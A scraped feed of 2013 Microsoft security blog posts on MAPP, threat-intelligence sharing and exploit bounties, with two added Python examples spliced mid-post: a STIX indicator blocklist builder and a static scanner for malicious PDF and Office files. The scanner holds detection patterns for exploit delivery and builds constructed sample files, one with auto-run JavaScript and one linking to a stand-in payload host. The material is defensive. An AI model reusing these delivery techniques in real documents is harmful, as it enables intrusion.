Platformhttp://blogs.technet.com/b/bluehat/archive/2013/09/16/mapp-initiatives-update-knowledge-exchange-platform.aspxMon, 16 Sep 2013 16:45:00 
GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:0d0c38e0-8d3f-4b48-8687-d0aa9211eab1BlueHat10http://blogs.technet.com/b/bluehat/rsscomments.aspx?WeblogPostID=3596971http://blogs.technet.com/b/bluehat/archive/2013/09/16/mapp-initiatives-update-knowledge-exchange-platform.aspx#comments<p><span style="font-family: Calibri; font-size: small;">A little more than a month ago, </span><a href="http://blogs.technet.com/b/bluehat/archive/2013/07/29/new-mapp-initiatives.aspx"><span style="color: #0563c1; font-family: Calibri; font-size: small;">we announced some new initiatives</span></a><span style="font-size: small;"><span style="font-family: Calibri;"> for the Microsoft Active Protections Program (MAPP). One of those announcements was &ldquo;MAPP for Responders.&rdquo; The initial response has been extremely positive, so we wanted to provide more information on how we are moving this program forward. </span></span></p> <p><span style="font-size: small;"><span style="font-family: Calibri;">Since the announcement, we&rsquo;ve been working towards launching two initiatives as a single beta with a limited set of customers and partners. The first is the pilot of the MAPP Scanner service that we previously announced.&nbsp; The second initiative is a beta of a completely new automated knowledge exchange platform. We alluded to this platform in our first post and want to give some additional details on this project.</span></span></p> <p><span style="font-family: Calibri; font-size: small;">Simply put, this is a distributed platform, running as a web service, that automates the sharing and consumption of threat information in machine-readable formats. 
As mentioned before, the platform supports the </span><a href="http://stix.mitre.org/"><span style="color: #0563c1; font-family: Calibri; font-size: small;">STIX</span></a><span style="font-family: Calibri; font-size: small;"> and </span><a href="http://taxii.mitre.org/"><span style="color: #0563c1; font-family: Calibri; font-size: small;">TAXII</span></a><span style="font-size: small;"><span style="font-family: Calibri;"> open specifications developed by MITRE, but it has been designed to support any message exchange service and message format that partners decide to implement. This helps accomplish multiple goals; here are two highlights:</span></span></p> <p><span style="font-size: small;"><span style="font-family: Calibri;">First, the platform will empower the industry by facilitating the sharing of threat information and enabling knowledge exchange scenarios that do not exist today. Customers and partners will have granular control over what they share and what they consume. </span></span></p> <p><span style="font-size: small;"><span style="font-family: Calibri;">Second, the platform has been designed to be highly extensible, with a modular plugin architecture that lets additional services be built on top of it. 
</span></span></p> <p><span style="font-size: small;"><span style="font-family: Calibri;">Figures 1 &ndash; 3 illustrate some of the sharing scenarios enabled by the platform:</span></span></p> <p><a href="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-49-67/2311.figure1.png"><img src="http://blogs.technet.com/resized-image.ashx/__size/550x0/__key/communityserver-blogs-components-weblogfiles/00-00-00-49-67/2311.figure1.png" alt="" width="213" height="144" border="0" /></a>&nbsp;</p> <p><em><span style="color: #44546a;"><span style="font-family: Calibri;">Figure 1 Publisher Subscriber</span></span></em></p> <p>&nbsp;<a href="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-49-67/4846.figure2.png"><img src="http://blogs.technet.com/resized-image.ashx/__size/550x0/__key/communityserver-blogs-components-weblogfiles/00-00-00-49-67/4846.figure2.png" alt="" width="153" height="155" border="0" /></a></p> <p><em><span style="color: #44546a;"><span style="font-family: Calibri;">Figure 2 Peer to Peer</span></span></em></p> <p><a href="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-49-67/2620.figure3.png"><img src="http://blogs.technet.com/resized-image.ashx/__size/550x0/__key/communityserver-blogs-components-weblogfiles/00-00-00-49-67/2620.figure3.png" alt="" width="224" height="149" border="0" /></a>&nbsp;</p> <p><em><span style="color: #44546a;"><span style="font-family: Calibri;">Figure 3 Hub and Spoke</span></span></em></p> <p><span style="font-size: small;"><span style="font-family: Calibri;">We have designed this platform to integrate into existing environments acting as an interchange point between both external and internal services and data formats. 
The platform enables real-time information sharing, and because the data is machine-readable, organizations can choose to automatically push the data into their network protection systems. </span></span></p> <p><span style="font-size: small;"><span style="font-family: Calibri;">I mentioned a limited beta with qualified customers and partners and wanted to list some of the criteria for participation. In addition to being able to sign required agreements and having a dedicated incident response team, participants in the initial beta will be required to provide a feed of threat data into the system. The beta will operate in phases with each lasting approximately 3 months. We expect to conduct three to four phases, expanding to more participants as we progress.</span></span></p> <p><span style="font-family: Calibri; font-size: small;">Many customers have already contacted us concerning participation and we will be following up with all of you very soon. For those enterprise customers who are interested in finding out more, the best path is to talk to your Microsoft Technical Account Manager (TAM). Other incident responders can send a note to </span><a href="mailto:mapp@microsoft.com"><span style="color: #0563c1; font-family: Calibri; font-size: small;">mapp@microsoft.com</span></a><span style="font-size: small;"><span style="font-family: Calibri;">. </span></span></p> <p><span style="font-size: small;"><span style="font-family: Calibri;">Keep an eye on this blog for future updates and announcements. We expect this work to go on for several months and are looking forward to input from participants to help shape the future of automated knowledge exchange. 
</span></span></p> <p><span style="font-size: small;"><span style="font-family: Calibri;">Regards,</span></span></p> <p><span style="font-size: small;"><span style="font-family: Calibri;">Jerry Bryant<br /> Senior Security Strategist Lead<br /> Microsoft Trustworthy Computing </span></span></p><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3596971&AppID=4967&AppType=Weblog&ContentType=0" width="1" height="1">Community-based DefenseMicrosoft Active Protections Program (MAPP) New MAPP Initiatives http://blogs.technet.com/b/bluehat/archive/2013/07/29/new-mapp-initiatives.aspxMon, 29 Jul 2013 16:58:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:1ed8ac72-c7f1-43ae-a9f5-98f36fc8ecf5BlueHat10http://blogs.technet.com/b/bluehat/rsscomments.aspx?WeblogPostID=3587371http://blogs.technet.com/b/bluehat/archive/2013/07/29/new-mapp-initiatives.aspx#comments<p><span style="font-size: small;"><span style="font-family: Calibri;">Hi everyone,</span></span></p> <p><span style="font-size: small;"><span style="font-family: Calibri;">Some of you may recall the launch of the Microsoft Active Protections Program (MAPP) back in 2008, when we began giving antivirus vendors security bulletin information early, so that they could develop and test signatures for vulnerabilities and be ready to release them when our bulletins were published. MAPP was our answer to a common phrase used back then: &ldquo;Update Tuesday, exploit Wednesday.&rdquo; This was a time when exploit writers had developed full automation for reverse engineering our security updates and building exploits. Security vendors received information at the same time as everyone else and had to then develop and test signatures before applying the updates. 
MAPP gave the security vendors, the &ldquo;good guys,&rdquo; a head start against the &ldquo;bad guys.&rdquo; In the years since its inception, MAPP has allowed these vendors to release protections when we release the updates, so that our customers have the time they need to test and deploy them. </span></span></p> <p><span style="font-size: small;"><span style="font-family: Calibri;">Along the way, MAPP has also become a key part of our incident response process when we find new exploits in the wild. During these incidents, we are able to help MAPP partners quickly build protections for our common customers by providing them with detailed detection guidance. In most cases, this gives customers a significant level of protection while we work on a permanent fix. </span></span></p> <p><span style="font-size: small;"><span style="font-family: Calibri;">Since the program launched, there has been little external change to how it operates. Internally, we have made slight adjustments to how the program is managed, but by and large it is the same program it was in 2008, and the same program our partners still say is essential to their operations. For example:</span></span></p> <p><span style="font-size: small;"><span style="font-family: Calibri;"><em>&ldquo;The MAPP program helps Trend Micro in further strengthening its defenses against cyber criminals. 
This timely information sharing works great in providing our customers the best and most accurate protection with the fewest false positives,&rdquo; </em>said Raimund Genes, CTO, Trend Micro.</span></span></p> <p><span style="font-size: small;"><span style="font-family: Calibri;"><em>&ldquo;The data from MAPP has proven to be a valuable source of information ahead of the curve, allowing us to better deliver faster protection against 0-day vulnerabilities to our customers.&rdquo;</em> -- Peter Szabo, Senior Threat Researcher, SophosLabs Canada</span></span></p> <p><span style="font-size: small;"><span style="font-family: Calibri;"><em>&ldquo;MAPP provides us with advance notification of vulnerabilities, as well as actionable information that allows us to even more quickly build protection for our customers. This saves us significant cycles, and MAPP&rsquo;s valuable information sharing fully supports our threat-centric approach to cybersecurity.&rdquo;</em> - Matt Watchinski, Vice President of Vulnerability Research, Sourcefire</span></span></p> <p><span style="font-size: small;"><span style="font-family: Calibri;"> Even with this level of success, we are always evaluating our programs. Today, we are introducing a few changes based on the changing threat landscape and feedback from our partners. </span></span></p> <p><strong><span style="font-size: small;"><span style="font-family: Calibri;">MAPP for Security Vendors</span></span></strong></p> <p><span style="font-size: small;"><span style="font-family: Calibri;">First, to define the existing program clearly and make plain how the new programs differ, we are now calling what the world today knows as MAPP &ldquo;MAPP for Security Vendors.&rdquo; Here is an outline of how the traditional MAPP program will look going forward:</span></span></p> <p><span style="font-family: Calibri; font-size: small;">The MSRC has a history of gathering and acting on feedback from our customers and partners. 
For example, the </span><a href="http://www.microsoft.com/about/twc/en/us/twcnext/timeline.aspx#2005-01"><span style="color: #0563c1; font-family: Calibri; font-size: small;">Software Update Validation Program (SUVP)</span></a><span style="font-size: small;"><span style="font-family: Calibri;"> allows qualified enterprises to test our security updates in a non-production environment and give us feedback on those updates before we release them. This partnership with our customers extends our internal testing to include many of the custom applications enterprises run in their networks. </span></span></p> <p><span style="font-size: small;"><span style="font-family: Calibri;">In much the same way, we are implementing <strong>MAPP Validate </strong>as part of MAPP for Security Vendors, which will allow qualified security vendors to give feedback on our detection guidance before we distribute it to the broader MAPP community. This is a community-based initiative that will streamline the development and use of detection guidance, so that customers get protections faster and of higher quality. </span></span></p> <p><span style="font-size: small;"><span style="font-family: Calibri;">Next, our partners say they are getting clear business value from the one-day head start we give them to develop protections. But sometimes building, testing, and deploying quality signatures takes additional time. So, on top of streamlining and improving the quality of detection guidance, we are expanding the signature development window from one to three business days for MAPP partners who meet certain stringent criteria. For example, partners must have at least a two-year track record of completing the reporting requirements of the program and a demonstrated willingness to partner back with us as they find new issues in the wild that we need to respond to quickly. Entry-level MAPP partners will still receive information only one day early. 
As always, we take customer security very seriously. Any partner found to have leaked information, either inadvertently or knowingly, is subject to removal from all parts of the program or, depending on the outcome of an investigation, to entry-level status only. </span></span></p> <p><strong><span style="font-size: small;"><span style="font-family: Calibri;">MAPP for Responders</span></span></strong></p> <p><span style="font-size: small;"><span style="font-family: Calibri;">Across the industry, it is recognized that targeted attacks are one of the primary threats to enterprises, governments and other entities. Incident responders, including response companies, CSIRTs, ISACs, and security vendors, represent the front lines in the fight to detect, respond to, and remediate these attacks. Through this new program, MAPP for Responders, we are working to build new partnerships and community collaborations that will enable strategic knowledge exchange. Microsoft intends to contribute to this effort by sharing threat indicators such as malicious URLs, file hashes, incident data and relevant detection guidance. Under a &ldquo;give to get&rdquo; model, participants benefit when the data they contribute is enriched by aggregation with data from others. </span></span></p> <p><span style="font-size: small;"><span style="font-family: Calibri;">How is MAPP for Responders different from MAPP for Security Vendors? At a high level, the former targets detection and remediation, while the latter is about developing protections. The information we plan to share with response partners is focused more on threat intelligence than specifically on vulnerabilities. Where the two programs come together is incident response. Arming more defenders against targeted attacks is a key part of our overall strategy. </span></span></p> <p><span style="font-size: small;"><span style="font-family: Calibri;">Effective knowledge exchange requires automation and a common format. 
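</span></span></p> <p>As an added illustration (not code from the MAPP program or from Microsoft), the following Python consumes indicator feeds in STIX, the MITRE format the Knowledge Exchange Platform post above says the platform supports, in the current STIX 2.1 JSON form maintained by OASIS rather than the XML-based STIX 1 of 2013. It covers the indicator types this section lists, malicious URLs and file hashes, plus domains and IPv4 addresses: it drops revoked and expired indicators, translates simple equality patterns into a blocklist, records which partner reported each value (the &ldquo;give to get&rdquo; aggregation described above), and matches an observed event against the result. The partner names, bundle contents and indicator values are constructed for the example; the .invalid host names and the 192.0.2.0/24 and 198.51.100.0/24 addresses are reserved documentation ranges.</p>

```python
"""Consume STIX 2.1 indicator bundles from several partners, merge them into one
blocklist that records who reported each value, and match observed events against
it.  Illustrative code, standard library only; every feed below is constructed."""
import ipaddress, json, re
from datetime import datetime, timezone
from urllib.parse import urlsplit

SAMPLE_HASH = "ab" * 32                                   # constructed, not a real sample
EXAMPLE_NOW = datetime(2024, 3, 1, tzinfo=timezone.utc)   # fixed clock for the demo
# STIX object paths this translator understands, mapped to a local indicator type.
PATH_TO_TYPE = {"file:hashes.'SHA-256'": "sha256", "url:value": "url",
                "domain-name:value": "domain", "ipv4-addr:value": "ipv4"}
# One observation expression holding a single equality comparison: [path = 'value']
COMPARISON = re.compile(r"^\[\s*([A-Za-z0-9_.'-]+:[A-Za-z0-9_.'-]+)\s*=\s*'([^']*)'\s*\]$")

def _indicator(num, pattern, **extra):
    """Minimal STIX 2.1 indicator object for the constructed sample feeds."""
    obj = {"type": "indicator", "spec_version": "2.1",
           "id": "indicator--00000000-0000-4000-8000-%012d" % num,
           "created": "2024-01-01T00:00:00.000Z", "modified": "2024-01-01T00:00:00.000Z",
           "valid_from": "2024-01-01T00:00:00Z", "pattern_type": "stix", "pattern": pattern}
    obj.update(extra)
    return obj

# Two hypothetical partner feeds; names, bundle ids and indicator values are made up.
PARTNER_FEEDS = {
    "partner-a": json.dumps({"type": "bundle", "id": "bundle--0a0a0a0a-0000-4000-8000-000000000001",
                             "objects": [
        _indicator(1, "[file:hashes.'SHA-256' = '%s']" % SAMPLE_HASH),
        _indicator(2, "[url:value = 'http://dropper.example.invalid/setup.exe'] "
                      "OR [domain-name:value = 'c2.example.invalid']"),
        _indicator(3, "[domain-name:value = 'old.example.invalid']", valid_until="2024-02-01T00:00:00Z"),
        _indicator(4, "[ipv4-addr:value = '192.0.2.10']", revoked=True),
        _indicator(5, "alert tcp any any -> any 80 (msg:\"x\"; sid:1;)", pattern_type="snort"),
        _indicator(6, "[file:name = 'a.exe' AND file:size > 1]")]}),   # conjunction: not translated
    "partner-b": json.dumps({"type": "bundle", "id": "bundle--0b0b0b0b-0000-4000-8000-000000000002",
                             "objects": [
        _indicator(7, "[file:hashes.'SHA-256' = '%s']" % SAMPLE_HASH.upper()),   # same hash, other case
        _indicator(8, "[ipv4-addr:value = '198.51.100.7']")]}),
}

def normalise(ioc_type, value):
    """Canonical form of an indicator value, or None if it is malformed."""
    value = value.strip()
    if ioc_type == "sha256":
        return value.lower() if re.fullmatch(r"[0-9a-fA-F]{64}", value) else None
    if ioc_type == "domain":
        return value.lower().rstrip(".") or None
    if ioc_type == "ipv4":
        try:
            return str(ipaddress.IPv4Address(value))
        except ValueError:
            return None
    return value or None                                   # url: kept verbatim

def extract_iocs(indicator, now):
    """(type, value) pairs from one indicator; empty if it is revoked, expired,
    not a STIX pattern, or uses logic this translator cannot apply safely."""
    if (indicator.get("type") != "indicator" or indicator.get("revoked")
            or indicator.get("pattern_type", "stix") != "stix"):
        return []
    until = indicator.get("valid_until")
    if until and datetime.fromisoformat(until.replace("Z", "+00:00")) <= now:
        return []
    pattern = indicator["pattern"].strip()
    observations = re.findall(r"\[[^\[\]]*\]", pattern)
    joiners = re.sub(r"\[[^\[\]]*\]", " ", pattern).split()
    if not observations or any(j != "OR" for j in joiners):
        return []           # AND / FOLLOWEDBY between observations needs real pattern evaluation
    found = []
    for obs in observations:   # OR branches are independent, so unsupported ones may be skipped
        m = COMPARISON.match(obs)
        if m and m.group(1) in PATH_TO_TYPE:
            ioc_type = PATH_TO_TYPE[m.group(1)]
            value = normalise(ioc_type, m.group(2))
            if value:
                found.append((ioc_type, value))
    return found

def build_blocklist(feeds, now=None):
    """Merge several partners' bundles into {(type, value): set(of reporting partners)},
    so independent corroboration of a value is visible to the consumer."""
    now = now or datetime.now(timezone.utc)
    blocklist = {}
    for source, raw in feeds.items():
        for obj in json.loads(raw).get("objects", []):
            for ioc in extract_iocs(obj, now):
                blocklist.setdefault(ioc, set()).add(source)
    return blocklist

def match_event(blocklist, event):
    """Check one observed event (fields sha256/url/domain/ipv4) against the
    blocklist; a URL is also checked by its host so domain indicators cover it."""
    lookups = [(t, event[t]) for t in ("sha256", "url", "domain", "ipv4") if event.get(t)]
    host = urlsplit(event["url"]).hostname if event.get("url") else None
    if host:
        lookups.append(("domain", host))
    hits = []
    for ioc_type, value in lookups:
        norm = normalise(ioc_type, value)
        if norm and (ioc_type, norm) in blocklist:
            hits.append({"type": ioc_type, "value": norm, "sources": sorted(blocklist[(ioc_type, norm)])})
    return hits
```

<p>Two design choices worth noting: an indicator whose observations are joined by AND or FOLLOWEDBY, or whose comparison the translator does not understand, is dropped rather than half-applied, because a partial translation of a conjunction would fire on benign observations; within an OR pattern only the supported branches are kept, which can lose coverage but never adds false positives. A real consumer would fetch the bundles over TAXII and re-evaluate valid_until on every run rather than once at import time.</p> <p><span style="font-size: small;"><span style="font-family: Calibri;">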
To accomplish this, we plan to support MITRE&rsquo;s STIX (Structured Threat Information Expression) and TAXII (Trusted Automated eXchange of Indicator Information) specifications. As open specifications for the formatting and transport of information, STIX and TAXII are starting to see broad adoption. Regardless of format, we want to serve customers by facilitating the flow of threat intelligence to organizations that can capitalize on it. As such, we will also seek to build transforms for other commonly used formats. This effort is currently in development, and we intend to launch a pilot in the near future. </span></span></p> <p><strong><span style="font-size: small;"><span style="font-family: Calibri;">MAPP Scanner</span></span></strong></p> <p><span style="font-size: small;"><span style="font-family: Calibri;">The MSRC employs some of the brightest engineers in the industry, the sort who&nbsp;build tools such as !exploitable, OffVis, and EMET. MAPP Scanner, currently in a closed pilot program, is a content-based vulnerability scanner developed by our security engineers to aid in investigating incidents. We are introducing MAPP Scanner as a cloud-based service that can be used to scan Office documents, PDF files, Flash movies, and suspect URLs to determine whether they are attempting to exploit a vulnerability. </span></span></p> <p><span style="font-size: small;"><span style="font-family: Calibri;">MAPP Scanner performs both static and active analysis to determine whether files are attempting to exploit a vulnerability. It spins up virtual machines for every supported version of Windows and opens content in supported versions of the appropriate application. MAPP Scanner can identify a known vulnerability and return the CVEs and affected platforms for that issue, while also flagging suspicious activity not associated with any known vulnerability for deeper analysis. 
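</span></span></p> <p>The static half of that pipeline, as an added example that is not MAPP Scanner&rsquo;s own code: a first-pass triage that identifies the container by its magic bytes, looks for structures routinely used to deliver exploits (JavaScript and auto-run actions in PDF; VBA macro projects, external OLE or template relationships and embedded Flash inside OOXML packages), and decides whether the file deserves detonation in an instrumented VM. The sample PDF and OOXML packages are constructed inline and are not real malware; the rules, severities, the compression-ratio threshold and the payload.example.invalid host are illustrative choices, not MAPP Scanner&rsquo;s.</p>

```python
"""Static first-pass triage of documents, in the spirit of the static half of a
content scanner: flag structures routinely used to deliver exploits and decide
whether a file deserves detonation in an instrumented VM.  Illustrative code,
standard library only; the sample files below are constructed, not real malware."""
import io
import re
import zipfile

SWF_MAGICS = (b"FWS", b"CWS", b"ZWS")              # uncompressed / zlib / LZMA Flash
OLE2_MAGIC = b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1"   # legacy .doc/.xls compound file
# Relationship types whose external targets pull remote content into a document.
RISKY_RELS = re.compile(r"relationships/(oleObject|attachedTemplate|frame)\b")
PDF_CHECKS = [
    (rb"/JavaScript|/JS\b", "high", "embedded JavaScript"),
    (rb"/Launch", "high", "launch action (runs an external program)"),
    (rb"/OpenAction|/AA\b", "medium", "automatic action on open (common in benign files; weigh with other hits)"),
    (rb"/EmbeddedFile", "medium", "embedded file"),
    (rb"/ObjStm", "info", "object streams present: names may be hidden in compressed objects"),
]

def unescape_pdf_names(data):
    """Decode #xx escapes in PDF names (/J#61vaScript -> /JavaScript), which a
    plain substring search would miss."""
    return re.sub(rb"#([0-9A-Fa-f]{2})", lambda m: bytes([int(m.group(1), 16)]), data)

def scan_pdf(data):
    text = unescape_pdf_names(data)
    return [(sev, why) for pat, sev, why in PDF_CHECKS if re.search(pat, text)]

def scan_ooxml(data):
    findings = []
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return [("high", "zip container is malformed; a parse failure is itself suspicious")]
    with zf:
        for info in zf.infolist():
            name = info.filename.lower()
            if name.endswith("vbaproject.bin"):
                findings.append(("high", "VBA macro project: " + info.filename))
            if name.endswith(".rels"):
                for tag in re.findall(r"<Relationship\b[^>]*>", zf.read(info).decode("utf-8", "replace")):
                    risky = RISKY_RELS.search(tag)
                    if risky and 'TargetMode="External"' in tag:
                        target = re.search(r'Target="([^"]*)"', tag)
                        findings.append(("high", "external %s link in %s: %s" % (
                            risky.group(1), info.filename, target.group(1) if target else "?")))
            if zf.open(info).read(3) in SWF_MAGICS:
                findings.append(("high", "embedded Flash object: " + info.filename))
            if info.compress_size and info.file_size / info.compress_size > 100:
                findings.append(("medium", "extreme compression ratio on " + info.filename))
    return findings

def triage(data):
    """Identify the container by magic bytes, run the matching static checks and
    say whether the file should go on to dynamic analysis."""
    if data.startswith(b"%PDF"):
        kind, findings = "pdf", scan_pdf(data)
    elif data.startswith(b"PK\x03\x04"):
        kind, findings = "ooxml", scan_ooxml(data)
    elif data.startswith(OLE2_MAGIC):
        kind, findings = "ole2", [("info", "legacy OLE2 container: stream-level checks need a CFB parser (not shown)")]
    elif data[:3] in SWF_MAGICS:
        kind, findings = "swf", [("medium", "stand-alone Flash movie; compressed variants need inflating first")]
    else:
        kind, findings = "unknown", [("info", "unrecognised format")]
    # Anything rated high goes to a VM; so does anything this pass cannot inspect.
    detonate = kind in ("ole2", "swf") or any(sev == "high" for sev, _ in findings)
    return {"kind": kind, "findings": findings, "detonate": detonate}

def build_sample_pdf(malicious):
    """Constructed minimal PDF; the malicious variant auto-runs JavaScript on open
    and hides the action name behind a #-escape."""
    catalog = b"<< /Type /Catalog /Pages 2 0 R" + (b" /OpenAction 3 0 R >>" if malicious else b" >>")
    action = b"3 0 obj\n<< /S /J#61vaScript /JS (app.alert(1)) >>\nendobj\n" if malicious else b""
    return (b"%PDF-1.4\n1 0 obj\n" + catalog + b"\nendobj\n2 0 obj\n<< /Type /Pages /Kids [] /Count 0 >>\n"
            + b"endobj\n" + action + b"trailer\n<< /Root 1 0 R >>\n%%EOF\n")

def build_sample_docx(macro, external_ole):
    """Constructed minimal OOXML package (enough structure for the checks, not a
    complete Word document)."""
    buf = io.BytesIO()
    rel = ('<Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/'
           'relationships/oleObject" Target="http://payload.example.invalid/a.rtf" TargetMode="External"/>')
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        zf.writestr("word/_rels/document.xml.rels",
                    "<Relationships>" + (rel if external_ole else "") + "</Relationships>")
        if macro:
            zf.writestr("word/vbaProject.bin", OLE2_MAGIC + b"\x00" * 16)
    return buf.getvalue()
```

<p>Two caveats a triage like this has to carry: a clean static verdict is only as good as what the scanner can see, so compressed PDF object streams and legacy OLE2 containers are reported as needing deeper parsing rather than passed as clean, and #-escaped PDF names are decoded before matching because a plain substring search misses /J#61vaScript. Dynamic detonation remains the authoritative check; the static pass only sets priorities.</p> <p><span style="font-size: small;"><span style="font-family: Calibri;">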
This combination of known-vulnerability matching and generic flagging makes MAPP Scanner effective at identifying previously unknown vulnerabilities, while also making responders&rsquo; incident investigations faster and more efficient.</span></span></p> <p><span style="font-size: small;"><span style="font-family: Calibri;">Making this technology available to partners who are likely targets of attacks, and to those who help them investigate and remediate security incidents, raises the likelihood that new attacks and attack vectors are discovered. It also makes investigations more efficient, which speeds up identifying and deploying the appropriate protections. </span></span></p> <p><strong><span style="font-size: small;"><span style="font-family: Calibri;">Going Forward</span></span></strong></p> <p><span style="font-size: small;"><span style="font-family: Calibri;">As with Microsoft&rsquo;s other security initiatives, such as the BlueHat Prize and our new bounty programs, the mission for MAPP is simple: mitigate entire classes of attack and protect customers. We have a long history of working across many different communities to drive this mission and will continue to do so. We are also working on a number of other initiatives, so going forward you can expect to hear more announcements from us in this space. 
</span></span></p>
<p>Jerry Bryant<br /> Senior Security Strategist</p>
<p>Microsoft Trustworthy Computing</p>
Microsoft Active Protections Program (MAPP)

Preparing for Live Pwnage: Mitigation Bypass Bounty Machine Specs for Black Hat
http://blogs.technet.com/b/bluehat/archive/2013/07/24/preparing-for-live-pwnage-mitigation-bypass-bounty-machine-specs-for-black-hat.aspx
Wed, 24 Jul 2013 21:39:00 GMT
d5e57398-b9ef-4490-9955-07cbb4e4a80d:f5471a59-559d-4493-91b7-d48076764326
BlueHat10
http://blogs.technet.com/b/bluehat/rsscomments.aspx?WeblogPostID=3586679
http://blogs.technet.com/b/bluehat/archive/2013/07/24/preparing-for-live-pwnage-mitigation-bypass-bounty-machine-specs-for-black-hat.aspx#comments
<p>With about one week to go before we all gather at Black Hat in Las Vegas, we’re getting inquiries about precisely how the promised Live Mitigation Bypass Bounty judging at Black Hat will work. For most of the world, it works best when you get a good spot at the Microsoft booth (#301) around noon each day, so you can clearly see the excitement as some of security’s best and brightest look to pop built-in Windows 8.1 Preview mitigations in truly novel ways. Will one or more talented folk qualify for the $100,000 bounty on new exploitation techniques? We’re as eager to find out as you are.</p>
<p><span style="font-size: small;"><span style="font-family: Calibri;">Perhaps <em>you</em> intend to be the first person EVER to qualify for the largest ongoing bounty for new attack techniques offered by any company so far. 
In that case, allow us to tell you more about the machine you’re looking to win. (In addition to $100,000, we’ll give anyone able to demonstrate a truly novel mitigation bypass the very computer on which they’ve demonstrated it.) The specifications for the machines at the booth on Wednesday and Thursday are as follows:</span></span></p>
<p><strong>The Specs</strong></p>
<ul>
<li>The machine: <a href="http://shop.lenovo.com/us/en/laptops/thinkpad/x-series/x1-carbon/index.html#techspecs">Lenovo ThinkPad X1 Carbon Touch</a></li>
<li>The host OS: Windows 8 (x64)</li>
<li>The guest OS: Windows 8.1 Preview (x64), using default settings and a local account</li>
<li>Guest RAM: 4GB</li>
<li>Guest processors: 4</li>
<li>Guest networked via a dedicated Network Interface Card</li>
</ul>
<p><strong>The Live Bounty Experience</strong></p>
<p>If you’re planning to try your hand at getting $100,000 from Microsoft, show up at the booth a little before lunchtime on the day of your choosing. <strong>We recommend coming by 12:30 PM, since the lunch hour starts at 12:45 PM.</strong></p>
<p>Bring your exploit (with source code) and a copy (electronic or print, as you prefer) of the white paper detailing the new exploit technique, as described in <a href="http://www.microsoft.com/security/msrc/report/bypass_bounty.aspx">the guidelines</a>. We’ll walk you through some basic qualifying questions listed in the guidelines -- things like making sure you don’t live in a country that is subject to US trade embargoes, and that you don’t work for Microsoft (or live with or are a close family member of someone who works here). As long as you’re over the ripe old age of 14 and have met all compliance requirements outlined in the guidelines, we’ll let you have a go at the $100,000 bounty. Minors should bring a parent or legal guardian to sign all the paperwork and accept the money on their behalf.</p>
<p>Two of our judges will be on hand as you demonstrate your bypass technique to the cheering throngs. If you’re successful at the live demo portion of the event, you and the judges will be whisked away to debrief in the private Judging Suite upstairs, where they’ll examine your work more closely and ask any relevant questions while you enjoy a well-earned break from the chaos. (It is possible we’ll be tweeting with excitement at this point, just because.) They will review your whitepaper as well in the suite, and the final qualification will come AFTER the judges have a chance to discuss the bypass privately with you.</p>
<p>Once the bypass and your eligibility are fully confirmed, we’ll tweet out confirmation (from <a href="http://twitter.com/k8em0">@k8em0</a> and <a href="http://twitter.com/msftsecresponse">@msftsecresponse</a>) to a breathlessly waiting world. The press will be eager to meet you, and our customers will be grateful that you decided to use your intellect for the greater good of helping to protect over a billion computers worldwide.</p>
<p><span style="font-size: small;"><span style="font-family: Calibri;">As far as qualifying for the BlueHat Bonus for Defense (up to an extra $50,000 for a defensive idea to go with your new exploitation technique), we’d gladly accept the whitepaper from you that describes that idea. 
We won’t be doing live qualifications for that portion in Vegas, however, since we’d need to judge those submissions against a range of factors such as application compatibility, among others, in order to determine a bounty there. If we do get a qualifying defensive submission as part of your entry, we’ll notify you of the good news via secure [at] Microsoft [dot] com as soon as we can.</span></span></p>
<p>Happy hunting --</p>
<p>Katie Moussouris<br />Senior Security Strategist, MSRC<br /><a href="http://twitter.com/k8em0">http://twitter.com/k8em0</a> (that’s a zero)</p>
bountyprograms, Security Ecosystem, Security Conference Engagement, Bounty, Black Hat

Secure Development Is Much Easier Than You Think
http://blogs.msdn.com/b/sdl/archive/2013/07/24/secure-development-is-much-easier-than-you-think.aspx
Wed, 24 Jul 2013 17:00:00 GMT
91d46819-8472-40ad-a661-2c78acb4018c:10436288
SDL Team0
http://blogs.msdn.com/b/sdl/rsscomments.aspx?WeblogPostID=10436288
http://blogs.msdn.com/b/sdl/archive/2013/07/24/secure-development-is-much-easier-than-you-think.aspx#comments
<p><span style="font-family: 'Calibri','sans-serif'; font-size: 10.5pt;">Secure software development is something we believe is absolutely critical to helping create safer, more trusted computing experiences for everyone. So much so that we invest in providing free tools, resources and guidance to assist organizations in 
adopting an SDL process, and are actively involved in helping to evangelize these resources to the security community. However, while these resources have existed since 2008, our <a href="http://blogs.technet.com/b/security/archive/2013/07/12/trust-in-computing-survey-part-2-less-than-half-of-developers-use-a-security-development-process.aspx" target="_parent">Trust in Computing study</a> showed that adoption still remains low, predominantly due to perceived cost and a lack of support and training.</span></p>
<p>With that in mind, we believe it’s important to help educate developers on just how easy it is to implement. We recently worked with Dr Dobb’s on an article to help raise awareness of several simple development and testing techniques that can help automate secure coding for Windows and Linux apps. If you are building apps or an SDL program, or are considering doing so, I strongly encourage you to check it out:</p>
<p>Link: <a href="http://www.drdobbs.com/security/secure-development-is-much-easier-than-y/240158709" target="_parent">Secure Development Is Much Easier Than You Think</a></p>
<p>Arjuna</p>
SDL, Security Tools, Security Development Lifecycle

Attention Bounty Hunters – The Ramp Up to Black Hat
http://blogs.technet.com/b/bluehat/archive/2013/07/17/attention-bounty-hunters-the-ramp-up-to-black-hat.aspx
Wed, 17 Jul 2013 15:57:00 GMT
d5e57398-b9ef-4490-9955-07cbb4e4a80d:4639b891-6563-42ca-ae53-dbe65ac5226a
BlueHat10
http://blogs.technet.com/b/bluehat/rsscomments.aspx?WeblogPostID=3585422
http://blogs.technet.com/b/bluehat/archive/2013/07/17/attention-bounty-hunters-the-ramp-up-to-black-hat.aspx#comments
<p>We’re three weeks into our new world of bounties for Microsoft products now, and as the clock ticks down on one program, we’re prepping for some live excitement with one of the others.</p>
